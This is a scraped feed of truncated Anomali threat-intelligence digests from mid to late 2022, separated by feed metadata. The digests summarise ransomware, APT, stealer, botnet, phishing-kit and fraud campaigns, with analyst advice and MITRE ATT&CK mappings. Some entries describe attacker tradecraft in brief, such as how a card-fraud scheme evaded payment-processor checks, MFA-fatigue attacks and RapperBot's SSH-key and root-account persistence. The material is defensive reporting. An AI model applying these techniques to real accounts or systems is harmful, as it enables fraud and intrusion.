trusted communication. MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Scheduled Task - T1053 | ]]> 2022-10-04T18:08:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-canceling-subscription-installs-royal-ransomware-lazarus-covinces-to-ssh-to-its-servers-polyglot-file-executed-itself-as-a-different-file-type-and-more www.secnews.physaphae.fr/article.php?IdArticle=7298043 False Ransomware,Malware,Tool,Threat,Medical APT 38 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence A Multimillion Dollar Global Online Credit Card Scam Uncovered (published: September 23, 2022) ReasonLabs researchers discovered a large network of fake dating and customer support websites involved in credit card fraud operations. The threat actor builds a basic website, registers it with a payment processor (RocketGate), buys credit card data from other threat actors, and subscribes victims to monthly charging plans. The US was the most targeted, and a lower number of sites were targeting France. To pass the processor checks and lower the number of charge-backs the actor avoided test charges, used a generic billing name, charged only a small, typical for the industry payment, and hired a legitimate support center provider, providing effortless canceling and returning of the payment. Analyst Comment: Users are advised to regularly check their bank statements and dispute fraudulent charges. Researchers can identify a fraudulent website by overwhelming dominance of direct-traffic visitors from a single country, small network of fake profiles, and physical address typed on a picture to avoid indexing. Tags: Credit card, Fraud, Scam, Chargeback, Payment processor, Fake dating site, USA, target-country:US, France, target-country:FR, target-sector:Finance NAICS 52 Malicious OAuth Applications Used to Compromise Email Servers and Spread Spam (published: September 22, 2022) Microsoft researchers described a relatively stealthy abuse of a compromised Exchange server used to send fraud spam emails. After using valid credentials to get access, the actor deployed a malicious OAuth application, gave it admin privileges and used it to change Exchange settings. The first modification created a new inbound connector allowing mails from certain actor IPs to flow through the victim’s Exchange server and look like they originated from the compromised Exchange domain. Second, 12 new transport rules were set to delete certain anti-spam email headers. Analyst Comment: If you manage an Exchange server, strengthen account credentials and enable multifactor authentication. Investigate if receiving alerts regarding suspicious email sending and removal of antispam header. MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Indicator Removal on Host - T1070 Tags: Exchange, Microsoft, PowerShell, Inbound connector, Transport rule, Fraud, Spam NFT Malware Gets New Evasion Abilities (published: September 22, 2022) Morphisec researchers describe a campaign targeting non-fungible token (NFT) communities since November 2020. A malicious link is being sent via Discord or other forum private phishing message related to an NFT or financial opportunity. If the user ]]> 2022-09-27T16:51:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-sandworm-uses-html-smuggling-and-commodity-rats-blackcat-ransomware-adds-new-features-domain-shadowing-is-rarely-detected-and-more www.secnews.physaphae.fr/article.php?IdArticle=7161515 False Ransomware,Spam,Malware,Tool,Threat None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Hacker Pwns Uber Via Compromised VPN Account (published: September 16, 2022) On September 15, 2022, ride-sharing giant Uber started an incident response after discovering a data breach. According to Group-IB researchers, download file name artifacts point to the attacker getting access to fresh keylogger logs affecting two Uber employees from Indonesia and Brazil that have been infected with Racoon and Vidar stealers. The attacker allegedly used a compromised VPN account credentials and performed multifactor authentication fatigue attack by requesting the MFA push notification many times and then making a social-engineering call to the affected employee. Once inside, the attacker allegedly found valid credentials for privilege escalation: a PowerShell script containing hardcoded credentials for a Thycotic privileged access management admin account. On September 18, 2022, Rockstar Games’ Grand Theft Auto 6 suffered a confirmed data leak, likely caused by the same attacker. Analyst Comment: Network defenders can consider setting up alerts for signs of an MFA fatigue attack such as a large number of MFA requests in a relatively short period of time. Review your source code for embedded credentials, especially those with administrative privileges. MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Credentials from Password Stores - T1555 Tags: MFA fatigue, Social engineering, Data breach, Uber, GTA 6, GTA VI, detection:Racoon, detection:Vidar, malware-type:Keylogger, malware-type:Stealer Self-Spreading Stealer Attacks Gamers via YouTube (published: September 15, 2022) Kaspersky researchers discovered a new campaign spreading the RedLine commodity stealer. This campaign utilizes a malicious bundle: a single self-extracting archive. The bundle delivers RedLine and additional malware, which enables spreading the malicious archive by publishing promotional videos on victim’s Youtube channel. These videos target gamers with promises of “cheats” and “cracks.” Analyst Comment: Kids and other online gamers should be reminded to avoid illegal software. It might be better to use different machines for your gaming and banking activities. MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Credentials from Password Stores - T1555 | [MITRE ATT&CK] Resource Hijacking - T1496 Tags: detection:RedLine, malware-type:Stealer, Bundle, Self-spreading, Telegraph, Youtub]]> 2022-09-20T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-uber-and-gta-6-were-breached-redline-bundle-file-advertises-itself-on-youtube-supply-chain-attack-via-ecommerce-fishpig-extensions-and-more www.secnews.physaphae.fr/article.php?IdArticle=7016803 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline Uber,Uber,APT 15,APT 41 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Microsoft Investigates Iranian Attacks Against the Albanian Government (published: September 8, 2022) Microsoft researchers discovered that groups working under Iran’s Ministry of Intelligence and Security (MOIS, tracked as OilRig) attacked the government of Albania. The attackers started with initial intrusion in May 2021, proceeded with mailbox exfiltrations between October 2021 and January 2022, organized controlled leaks, and culminated on July 15, 2022, with disruptive ransomware and wiper attacks. This attack is probably a response to the June 2021 Predatory Sparrow’s anti-Iranian cyber operations promoting the Mujahedin-e Khalq (MEK), an Iranian dissident group largely based in Albania. Analyst Comment: MOIS attack on Albania uses messaging and targeting similar to the previous MEK-associated attack on Iran. It tells us that Iran has chosen to engage in a form of direct and proportional retaliation as it sees it. Still, the attack and its attribution caused Albania to cut diplomatic ties with Iran and expel the country's embassy staff. Organizations should implement multifactor authentication (MFA) for mailbox access and remote connectivity. Anomali platform users advised to block known OilRig network indicators. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Impair Defenses - T1562 | [MITRE ATT&CK] Indicator Removal on Host - T1070 Tags: OilRig, Helix Kitten, APT34, MOIS, Ministry of Intelligence and Security, Predatory Sparrow, Wiper, CVE-2021-26855, CVE-2019-0604, CVE-2022-28799, Government, Albania, target-country:AL, Iran, source-country:IR, DEV-0842, DEV-0861, DEV-0166, DEV-0133, Europium, APT, detection:Jason, detection:Mellona BRONZE PRESIDENT Targets Government Officials (published: September 8, 2022) Secureworks researchers detected a new campaign by China-sponsored group Mustang Panda (Bronze President). In June and July 2022, the group used spearphishing to deliver the PlugX malware to government officials in Europe, the Middle East, and South America. To bypass mail-scanning antiviruses, the archived email attachment had malware embedded eight levels deep in a sequence of hidden folders named with special characters. Analyst Comment: Many advanced attacks start with basic techniques such as unwarranted email with malicious attachment that requires the user to open it and enable macros. It is important to teach your users basic online hygiene and phishing awareness. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | ]]> 2022-09-13T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-iran-albanian-cyber-conflict-ransomware-adopts-intermittent-encryption-dll-side-loading-provides-variety-to-plugx-infections-and-more www.secnews.physaphae.fr/article.php?IdArticle=6869959 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline APT 27,APT 34 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence EvilProxy Phishing-As-A-Service With MFA Bypass Emerged In Dark Web (published: September 5, 2022) Resecurity researchers analyzed EvilProxy, a phishing kit that uses reverse proxy and cookie injection methods to bypass two-factor authentication (2FA). EvilProxy uses extensive virtual machine checks and browser fingerprinting. If the victim passes the checks, Evilproxy acts as a proxy between the victim and the legitimate site that asks for credentials. EvilProxy is being sold as a service on the dark web. Since early May 2022, Evilproxy enables phishing attacks against customer accounts of major brands such as Apple, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, Twitter, Yahoo, Yandex, and others. Analyst Comment: EvilProxy is a dangerous automation tool that enables more phishing attacks. Additionally, EvilProxy targeting GitHub and npmjs accounts increases risks of follow-up supply-chain attacks. Anomali platform has historic EvilProxy network indicators that can help when investigating incidents affecting 2FA. With 2FA bypass, users need to be aware of phishing risks and pay even more attention to domains that ask for their credentials and 2FA codes. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Supply Chain Compromise - T1195 Tags: EvilProxy, Phishing, Phishing-as-s-service, Reverse proxy, Cookie injection, 2FA, MFA, Supply chain Ragnar Locker Ransomware Targeting the Energy Sector (published: September 1, 2022) Cybereason researchers investigated the Ragnar Locker ransomware that was involved in cyberattack on DESFA, a Greek pipeline company. On August 19, 2022, the Ragnar Locker group listed DESFA on its data leak site. The group has been active since 2019 and it is not the first time it targets critical infrastructure companies with the double-extortion scheme. Their Ragnar Locker ransomware shows the typical abilities of modern ransomware including system information and location collection, deleting shadow copies, identifying processes (antiviruses, backup solutions, IT remote management solutions, and virtual-based software), and encrypting the system with the exception list in mind. Analyst Comment: Ragnar Locker appears to be an aggressive ransomware group that is not shy attacking critical infrastructure as far as they are not in the Commonwealth of Independent States (Russia and associated countries). Always be on high alert while reading emails, in particular those with attachments, URL redirection, false sense of urgency or poor grammar. Use anti-spam and antivirus protection, and avoid opening email from untrusted or unverified senders. Additionally, it is important to have a comprehensive and teste]]> 2022-09-07T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-evilproxy-defeats-second-factor-ragnar-locker-ransomware-hits-critical-infrastructure-montenegro-blames-russia-for-massive-cyberattack-and-more www.secnews.physaphae.fr/article.php?IdArticle=6768417 False Ransomware,Malware,Tool,Threat,Patching,Guideline Yahoo None Anomali - Firm Blog recent research by ESG, 52% of respondents believe security operations are more difficult today than they were two years ago. Responses stated this was due to multiple factors, such as the increasingly dangerous threat landscape, a growing attack surface, the volume and complexity of security alerts, and public cloud proliferation.  Today’s threats are more sophisticated than ever, making them more challenging to defend against. Security teams must constantly do more with less, protecting more data, endpoints, and applications. And, as the threat landscape evolves, so will they, but chances are they must do so with fewer resources. The growing list of challenges is never-ending. So what tops the list? An Ever-Growing Attack Surface Organizations are collecting and storing more data than ever, driven by more cloud-based applications and services. This new on-prem/off-prem environment has created more potential entry points for attackers. Additionally, many organizations lose track of their assets, failing to update policies and their security infrastructure, leaving them vulnerable to attacks that exploit known vulnerabilities. Another reason security teams face more challenges today is the increasing number of mobile devices and cloud apps used by employees. These devices and apps can provide a convenient way for employees to access company data, but they can also be a security risk if they are not adequately secured. The Evolving Threat Landscape  As the attack surface grows, so does the number of potential threats. Security teams must now contend with a broader range of threats, including sophisticated malware, zero-day exploits, and ransomware. Additionally, attackers are becoming more brazen and are targeting high-profile organizations with well-funded security operations. In addition, the rise of social media has created new opportunities for hackers to launch cyber attacks. Social media platforms can spread malware or gather information about people’s online habits, used to launch targeted attacks and infiltrate enterprise organizations. Increasing Compliance Requirements Organizations must comply with an ever-growing number of regulations, such as the EU’s General Data Protection Regulation (GDPR), that require security teams to put in place additional controls and processes, which can be costly and time-consuming. Additionally, compliance failures can result in heavy fines and strain an already tight budget. Limited Resources According to (ISC)²'s 2021 Cyber Workforce Report, the global cybersecurity workforce needs to grow 65 percent to defend organizations’ critical assets effectively. While the number of professionals required to fill the gap has decreased, the number of qualified cyber professionals will fall even further due to the growing demand for highly skilled individuals. Complex Tech Stack Enterprises frequently deploy new security tools and services to address changing needs and increased threats. As previously mentioned, a typical enterprise SOC may use a combination of twenty or more technologies, making it difficult to customize each solution for its environment. The interoperability issues caused by the possibility of using multiple vendors make it very challenging to get a complete picture of your overall security environment. The Need to Adapt Despite these challenges, security teams must find ways to adapt to protect their organizations effectively against ever-evolving threats.  So what c]]> 2022-09-01T16:50:00+00:00 https://www.anomali.com/blog/security-operations-are-more-difficult-now-more-than-ever-buy-why www.secnews.physaphae.fr/article.php?IdArticle=6667648 False Malware,Tool,Threat,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence LastPass Hackers Stole Source Code (published: August 26, 2022) In August 2022, an unidentified threat actor gained access to portions of the password management giant LastPass development environment. LastPass informed that it happened through a single compromised developer account and the attacker took portions of source code and some proprietary LastPass technical information. The company claims that this incident did not affect customer data or encrypted password vaults. Analyst Comment: This incident doesn’t seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment since “white-box hacking” (when source code of the attacking system is known) is easier for threat actors. Organizations providing public-facing software should take maximum measures to block threat actors from their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development. Tags: LastPass, Password manager, Data breach, Source code Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli (published: August 25, 2022) Starting in July 2022, a new campaign by Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers detected that this campaign was leveraging exploitation of Log4j 2 vulnerabilities (CVE-2021-45046 and CVE-2021-44228) in SysAid applications (IT management tools). For persistence Static Kitten was dropping webshells, creating local administrator accounts, stealing credentials, and adding their tools in the startup folders and autostart extensibility point (ASEP) registry keys. Overall the group was heavily using various open-source and built-in operating system tools: eHorus remote management software, Ligolo reverse tunneling tool, Mimikatz credential theft tool, PowerShell programs, RemCom remote service, Venom proxy tool, and Windows Management Instrumentation (WMI). Analyst Comment: Network defenders should monitor for alerts related to web shell threats, suspicious RDP sessions, ASEP registry anomaly, and suspicious account creation. Similarly, SysAid users can monitor for webshells and abnormal processes related to SysAisServer instance. Even though Static Kitten was observed leveraging the Log4Shell vulnerabilities in the past (targeting VMware apps), most of their attacks still start with spearphishing, often from a compromised email account. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Phishing - T1566 | ]]> 2022-08-30T15:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-first-real-life-video-spoofing-attack-magicweb-backdoors-via-non-standard-key-identifier-lockbit-ransomware-blames-victim-for-ddosing-back-and-more www.secnews.physaphae.fr/article.php?IdArticle=6626943 False Ransomware,Hack,Tool,Vulnerability,Threat,Guideline,Cloud APT 29,APT 37,LastPass None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Reservations Requested: TA558 Targets Hospitality and Travel (published: August 18, 2022) Since 2018, financially-motivated threat group TA558 has targeted hospitality and travel with reservation-themed, business-relevant phishing emails. The group concentrates on targeting Latin America using lures written in Portuguese and Spanish, and sometimes uses English and wider targeting (North America, Western Europe). TA558 was seen leveraging at least 15 different malware payloads, most often AsyncRAT, Loda RAT, Revenge RAT, and Vjw0rm. In 2022, Proofpoint researchers detected that TA558 increased its activity and moved from using malicious macros to URLs and container files (ISO, RAR). Analyst Comment: Microsoft’s preparations to disable macros by default in Office products caused multiple threat groups including TA558 to adopt new filetypes to deliver payloads. It is crucial for personnel working with invoices and other external attachments to use updated, secured systems and be trained on phishing threats. Anomali Match can be used to quickly search your infrastructure for known TA558 IOCs. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 Tags: TA558, AsyncRAT, Loda, RAT, Vjw0rm, BluStealer, Revenge RAT, XtremeRAT, Hospitality, Travel, Phishing, ISO, RAR, PowerShell, CVE-2017-11882, CVE-2017-8570 Estonia Subjected to 'Extensive' Cyberattacks after Moving Soviet Monuments (published: August 18, 2022) On August 17, 2022, Russian hacktivist group KillNet launched distributed denial-of-service (DDoS) attacks targeting Estonia. The Estonian government confirmed receiving the “most extensive” DDoS attacks in 15 years, but stressed that all services are back online after just some minor interruptions. Small and medium-sized DDoS attacks targeted 16 state and private organizations in the country, with seven of them experiencing downtime as a result. Specifically, the Estonian Tax and Customs Board website was unavailable for about 70 minutes. Analyst Comment: Russian cyber activity follows political tensions, this time coinciding with the removal of a Red Army memorial. Estonia seemingly easily fended off this Russian DDoS attack, but the country is one of the top in cyber preparedness, and Russia limited it’s strike to using hacktivist groups that give plausible deniability when attributing the cyber attack on a NATO country. Organizations that rely on stable work of their I]]> 2022-08-23T17:35:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-emissary-panda-adds-new-operation-systems-to-its-supply-chain-attacks-russia-sponsored-seaborgium-spies-on-nato-countries-ta558-switches-from-macros-to-container-files-and-more www.secnews.physaphae.fr/article.php?IdArticle=6487319 False Ransomware,Malware,Tool,Threat APT 27 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence APT-C-35: New Windows Framework Revealed (published: August 11, 2022) The DoNot Team (APT-C-35) are India-sponsored actors active since at least 2016. Morphisec Labs researchers discovered a new Windows framework used by the group in its campaign targeting Pakistani government and defense departments. The attack starts with a spearphishing RTF attachment. If opened in a Microsoft Office application, it downloads a malicious remote template. After the victim enables editing (macroses) a multi-stage framework deployment starts. It includes two shellcode stages followed by main DLL that, based on victim fingerprinting, downloads a custom set of additional information-stealing modules. Analyst Comment: The described DoNot Team framework is pretty unique in its customisation, fingerprinting, and module implementation. At the same time, the general theme of spearphishing attachment that asks the targeted user to enable editing is not new and can be mitigated by anti-phishing training and Microsoft Office settings hardening. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Template Injection - T1221 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Information Discovery - T1082 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Screen Capture - T1113 | [MITRE ATT&CK] Data from Local System - T1005 | [MITRE ATT&CK] Data from Removable Media - T1025 | [MITRE ATT&CK] Data from Network Shared Drive - T1039 | [MITRE ATT&CK] Credentials from Password Stores - T1555 | [MITRE ATT&CK] Data Staged - T1074 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 Tags: APT-C-35, DoNot Team, APT, India, source-country:IN, Government, Military, Pakistan, target-country:PK, Windows]]> 2022-08-16T15:06:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-ransomware-module-added-to-sova-android-trojan-bitter-apt-targets-mobile-phones-with-dracarys-china-sponsored-ta428-deploys-six-backdoors-at-once-and-more www.secnews.physaphae.fr/article.php?IdArticle=6354068 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline,Medical APT 38 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence So RapperBot, What Ya Bruting For? (published: August 3, 2022) RapperBot, a new Internet of things (IoT) botnet, is rapidly evolving despite appearing in the wild just two months ago (June 2022). Fortinet researchers discovered that RapperBot heavily reuses parts of the Mirai source code, but changed the attack vector (brute-forcing SSH instead of Telnet), command and control (C2) protocol, and added persistence capabilities. RapperBot maintains remote access by adding the attacker's public key to ~/.ssh/authorized_keys. The latest RapperBot samples also started adding the root user "suhelper” to /etc/passwd and /etc/shadow/, and continue to add the root user account every hour. Top targeted IPs were from Taiwan, USA, and South Korea, in that order. RapperBot has basic DDoS capabilities such as UDP and TCP STOMP flood copied from Mirai source code. Analyst Comment: Despite sharing a significant amount of source code with Mirai variants, RapperBot appears to be developed by a persistent actor and not a novice motivated by notoriety. It is possible that the actors will add new impact functionality after the RapperBot botnet grows substantially. SSH server administrators should adhere to secure password practices. It is also important to note that simply restarting the device, changing SSH credentials or even disabling SSH password authentication does not remove the RapperBot infection. MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Network Denial of Service - T1498 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Scheduled Task - T1053 Tags: RapperBot, Taiwan, target-country:TW, USA, target-country:US, South Korea, target-country:KR, SSH brute force, DDoS, IoT, ARM, MIPS, SPARC, x86, Linux, UDP flood, TCP STOMP, port:4343, port:4344, port:4345, port:48109, Mirai Woody RAT: A New Feature-Rich Malware Spotted in the Wild (published: August 3, 2022) Malwarebytes researchers have identified a new Remote Access Trojan (RAT) dubbed Woody Rat. It has been used by unidentified attackers for at least one year targeting Russian organizations in the aerospace industry. Two kinds of spearphishing attachment were used. Initially, Woody Rat was delivered via archived executable with double extension .DOC.EXE. More recently, the attackers switched to Microsoft Office documents leveraging the Follina (CVE-2022-30190) vulnerability. Woody Ra]]> 2022-08-09T15:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-rapperbot-persists-on-ssh-servers-manjusaka-attack-framework-tested-in-china-blackcat-darkside-ransom-energy-again-and-more www.secnews.physaphae.fr/article.php?IdArticle=6212381 False Ransomware,Malware,Tool,Vulnerability,Threat None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence SharpTongue Deploys Clever Mail-Stealing Browser Extension “SHARPEXT” (published: July 28, 2022) Volexity researchers discovered SharpExt, a new malicious browser app used by the North-Korea sponsored Velvet Chollima (Kimsuky, SharpTongue, Thallium) group. SharpExt inspects and exfiltrates data from a victim's webmail (AOL or Gmail) account as they browse it. Velvet Chollima continues to add new features to the app, the latest known version (3.0) supports three browsers: Microsoft Edge, Google Chrome, and Whale, the latter almost exclusively used in South Korea. Following the initial compromise, Velvet Chollima deploy SharpExt and to avoid warning the victim they manually exfiltrate settings files to change the settings and generate a valid "super_mac" security check value. They also hide the newly opened DevTools window and any other warning windows such as a warning regarding extensions running in developer mode. Analyst Comment: Velvet Chollima is known for its tactic of deploying malicious browser extensions, but in the past it was concentrating on stealing credentials instead of emails. The group continues aggressive cyberespionage campaigns exfiltrating military and industrial technologies from Europe, South Korea, and the US. Network defenders should monitor for suspicious instances of PowerShell execution, as well as for traffic to and from known Velvet Chollima infrastructure (available in Anomali Match). MITRE ATT&CK: [MITRE ATT&CK] Browser Extensions - T1176 | [MITRE ATT&CK] Email Collection - T1114 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Hide Artifacts - T1564 Tags: SharpExt, Velvet Chollima, Kimsuky, SharpTongue, Thallium, APT, North Korea, source-country:KP, South Korea, target-country:KR, USA, target-country:US, target-region:Europe, AOL, Gmail, Edge, Chrome, Whale, PowerShell, VBS, Browser extension Untangling KNOTWEED: European Private-Sector Offensive Actor Using 0-Day Exploits (published: July 27, 2022) Microsoft researchers detail activity of DSIRF, Austrian private-sector offensive actor (PSOA). In 2021, this actor, tracked as Knotweed, used four Windows and Adobe 0-day exploits. In 2022, DSIRF was exploiting another Adobe Reader vulnerability, CVE-2022-22047, which was patched in July 2022. DSIRF attacks rely on their malware toolset called Subzero. The initial downloader shellcode is executed from either the exploit chains or malicious Excel documents. It downloads a JPG image file with extra encrypted data, extracts, decrypts and loads to the memory the Corelump memory-only infostealer. For persistence, Corelump creates trojanized copies of legitimate Windows DLLs that se]]> 2022-08-02T15:17:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-velvet-chollima-steals-emails-from-browsers-austrian-mercenary-leverages-zero-days-china-sponsored-group-uses-cosmicstrand-uefi-firmware-rootkit-and-more www.secnews.physaphae.fr/article.php?IdArticle=6091651 False Malware,Tool,Vulnerability,Threat,Patching,Guideline,Cloud APT 37,APT 28 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Lightning Framework: New Undetected “Swiss Army Knife” Linux Malware (published: July 21, 2022) Intezer researchers discovered a new Linux malware called Lightning Framework (Lightning). It is a modular framework able to install multiple types of rootkits and to run various plugins. Lightning has passive and active capabilities for communication with the threat actor, including opening up SSH service via an OpenSSH daemon, and a polymorphic command and control (C2) configuration. Lightning is a newly discovered threat, and there is no information about its use in the wild and the actors behind it. Analyst Comment: Defenders should block known Lightning indicators. Monitor for file creation based on the Lightning naming convention. MITRE ATT&CK: [MITRE ATT&CK] Logon Scripts - T1037 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Hide Artifacts - T1564 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Rootkit - T1014 | [MITRE ATT&CK] Indicator Removal on Host - T1070 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Network Service Scanning - T1046 | [MITRE ATT&CK] Network Sniffing - T1040 | [MITRE ATT&CK] System Information Discovery - T1082 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Standard Non-Application Layer Protocol - T1095 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 Tags: Lightning Framework, Linux, Lightning.Downloader, Lightning.Core, Typosquatting, Masquerading, Timestomping, Port:33229 Google Ads Lead to Major Malvertising Campaign (published: July 20, 2022) Malwarebytes researchers discovered a malvertising campaign abusing Google Search advertisements for popular keywords such as “amazon,” “fac]]> 2022-07-26T17:10:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cozy-bear-abuses-google-drive-api-complex-lightning-framework-targets-linux-google-ads-hide-fraudulent-redirects-and-more www.secnews.physaphae.fr/article.php?IdArticle=5953922 False Malware,Tool,Threat,Guideline APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Digium Phones Under Attack: Insight Into the Web Shell Implant (published: July 15, 2022) Palo Alto Unit42 researchers have uncovered a large-scale campaign targeting Elastix VoIP telephony servers used in Digium phones. The attackers were exploiting CVE-2021-45461, a remote code execution (RCE) vulnerability in the Rest Phone Apps (restapps) module. The attackers used a two-stage malware: initial dropper shell script was installing the PHP web shell backdoor. The malware achieves polymorphism through binary padding by implanting a random junk string into each malware download. This polymorphism allowed Unit42 to detect more than 500,000 unique malware samples from late December 2021 till the end of March 2022. The attackers use multilayer obfuscation, schedules tasks, and new user creation for persistence. Analyst Comment: Potentially affected FreePBX users should update their restapps (the fixed versions are 15.0.20 and 16.0.19, or newer). New polymorphic threats require a defense-in-depth strategy including malware sandbox detection and orchestrating multiple security appliances and applications. MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Indicator Removal on Host - T1070 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 Tags: CVE-2021-45461, Digium Asterisk, PHP Web Shell, Binary padding, Rest Phone Apps, restapps, FreePBX, Elastix North Korean Threat Actor Targets Small and Midsize Businesses with H0lyGh0st Ransomware (published: July 14, 2022) Microsoft researchers have linked an emerging ransomware group, H0lyGh0st Ransomware (DEV-0530) to financially-motivated North Korean state-sponsored actors. In June-October 2021, H0lyGh0st used SiennaPurple ransomware family payloads written in C++, then switched to variants of the SiennaBlue ransomware family written in Go. Microsoft detected several successfully compromised small-to-mid-sized businesses, including banks, event and meeting planning companies, manufacturing organizations, and schools. Analyst Comment: Small-to-mid-sized businesses should consider enforcing multi-factor authentication (MFA) on all accounts, cloud hardening, and regular deployment of updates with Active Directory being the top priority. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Scheduled Task - T1053 | ]]> 2022-07-19T15:10:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-h0lygh0st-ransomware-earns-for-north-korea-ot-unlocking-tools-drop-sality-switch-case-oriented-programming-for-chromeloader-and-more www.secnews.physaphae.fr/article.php?IdArticle=5826660 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Targets of Interest | Russian Organizations Increasingly Under Attack By Chinese APTs (published: July 7, 2022) SentinelLabs researchers detected yet another China-sponsored threat group targeting Russia with a cyberespionage campaign. The attacks start with a spearphishing email containing Microsoft Office maldocs built with the Royal Road malicious document builder. These maldocs were dropping the Bisonal backdoor remote access trojan (RAT). Besides targeted Russian organizations, the same attackers continue targeting other countries such as Pakistan. This China-sponsored activity is attributed with medium confidence to Tonto Team (CactusPete, Earth Akhlut). Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from advanced persistent threats (APTs), including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] 